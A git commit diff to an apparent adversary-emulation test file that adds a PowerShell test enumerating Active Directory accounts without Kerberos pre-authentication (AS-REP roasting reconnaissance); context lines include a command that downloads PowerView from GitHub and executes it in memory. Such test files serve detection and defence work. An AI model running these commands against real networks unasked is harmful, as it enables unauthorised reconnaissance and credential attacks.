Update T1069.002.yaml (#1082)
test to enumerate accounts not requiring kerb preauth
This commit is contained in:
Brandon Morgan
@@ -78,4 +78,14 @@ atomic_tests:
|
||||
executor:
|
||||
command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
|
||||
name: powershell
|
||||
|
||||
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
|
||||
description: |
|
||||
When successful, accounts that do not require kerberos pre-auth will be returned
|
||||
Requires the Active Directory module for powershell to be installed
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
|
||||
|
||||
Reference in New Issue
Block a user